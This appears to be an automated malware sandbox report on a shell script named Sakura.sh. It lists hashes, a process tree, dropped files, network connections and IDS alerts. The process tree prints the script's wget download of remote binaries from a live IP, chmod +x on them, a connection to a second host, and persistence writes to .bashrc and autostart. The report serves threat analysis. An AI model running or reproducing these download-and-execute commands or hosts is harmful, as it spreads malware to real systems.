| download: | /Sakura.sh |
| Full analysis: | https://app.any.run/tasks/f5714cff-6e44-408b-a93e-c8283de13812 |
| Verdict: | Malicious activity |
| Analysis date: | May 17, 2025, 20:19:09 |
| OS: | Ubuntu 22.04.2 |
| MIME: | text/x-shellscript |
| File info: | Bourne-Again shell script, ASCII text executable |
| MD5: | 820B9853E0E3B8153D6D14336763823A |
| SHA1: | 3E722766792A577582141C87737CAC1F2D9E8E99 |
| SHA256: | 7E80330CA02BEAED0FDDD74EAC8195889CCB309521D7D583CC1EB1D7F7A8C1C4 |
| SSDEEP: | 48:vvd8jSttQdM5YiRW7zT6XCZIQL1y5NZIgxJT:vvd8jSttQdM5YiRW7zT6XCZIQBy5NZIM |
| .sh | | | Linux/UNIX shell script (100) |
|---|
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 41030 | /bin/sh -c "sudo chown user /tmp/Sakura\.sh && chmod +x /tmp/Sakura\.sh && DISPLAY=:0 sudo -iu user /tmp/Sakura\.sh " | /usr/bin/dash | — | IntiFjKCklFyPMJr | |||||||||||
User: root Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41031 | sudo chown user /tmp/Sakura.sh | /usr/bin/sudo | — | dash | |||||||||||
User: root Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41032 | chown user /tmp/Sakura.sh | /usr/bin/chown | — | sudo | |||||||||||
User: root Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41033 | chmod +x /tmp/Sakura.sh | /usr/bin/chmod | — | dash | |||||||||||
User: root Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41034 | sudo -iu user /tmp/Sakura.sh | /usr/bin/sudo | — | dash | |||||||||||
User: root Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41035 | /bin/bash /tmp/Sakura.sh | /usr/bin/bash | — | sudo | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41036 | /usr/bin/locale-check C.UTF-8 | /usr/bin/locale-check | — | bash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41037 | wget http://146.103.53.37/m-i.p-s.Sakura | /usr/bin/wget | bash | ||||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41038 | chmod +x m-i.p-s.Sakura | /usr/bin/chmod | — | bash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41039 | /bin/bash /tmp/Sakura.sh | /usr/bin/bash | — | bash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 32256 | |||||||||||||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 41037 | wget | /tmp/m-i.p-s.Sakura (deleted) | binary | |
MD5:— | SHA256:— | |||
| 41042 | wget | /tmp/m-p.s-l.Sakura | binary | |
MD5:— | SHA256:— | |||
| 41047 | wget | /tmp/s-h.4-.Sakura (deleted) | binary | |
MD5:— | SHA256:— | |||
| 41052 | wget | /tmp/x-8.6-.Sakura | binary | |
MD5:— | SHA256:— | |||
| 41054 | x-8.6-.Sakura | /home/user/.config/autostart/.xdg.conf | text | |
MD5:— | SHA256:— | |||
| 41058 | dash | /home/user/.bashrc | text | |
MD5:— | SHA256:— | |||
| 41061 | dash | /tmp/.sysctl_max (deleted) | text | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 204 | 185.125.190.17:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
— | — | GET | 204 | 185.125.190.17:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
41037 | wget | GET | 200 | 146.103.53.37:80 | http://146.103.53.37/m-i.p-s.Sakura | unknown | — | — | unknown |
41042 | wget | GET | 200 | 146.103.53.37:80 | http://146.103.53.37/m-p.s-l.Sakura | unknown | — | — | unknown |
41047 | wget | GET | 200 | 146.103.53.37:80 | http://146.103.53.37/s-h.4-.Sakura | unknown | — | — | unknown |
41052 | wget | GET | 200 | 146.103.53.37:80 | http://146.103.53.37/x-8.6-.Sakura | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
484 | avahi-daemon | 224.0.0.251:5353 | — | — | — | unknown |
— | — | 185.125.190.17:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted |
— | — | 195.181.170.19:443 | odrs.gnome.org | Datacamp Limited | DE | whitelisted |
— | — | 185.125.188.58:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
41037 | wget | 146.103.53.37:80 | — | — | BE | unknown |
41042 | wget | 146.103.53.37:80 | — | — | BE | unknown |
41047 | wget | 146.103.53.37:80 | — | — | BE | unknown |
41052 | wget | 146.103.53.37:80 | — | — | BE | unknown |
41054 | x-8.6-.Sakura | 202.181.24.126:9663 | — | Cloudie Limited | HK | unknown |
Domain | IP | Reputation |
|---|---|---|
connectivity-check.ubuntu.com |
| whitelisted |
google.com |
| whitelisted |
odrs.gnome.org |
| whitelisted |
api.snapcraft.io |
| whitelisted |
10.100.168.192.in-addr.arpa |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
41037 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41042 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41047 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41052 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |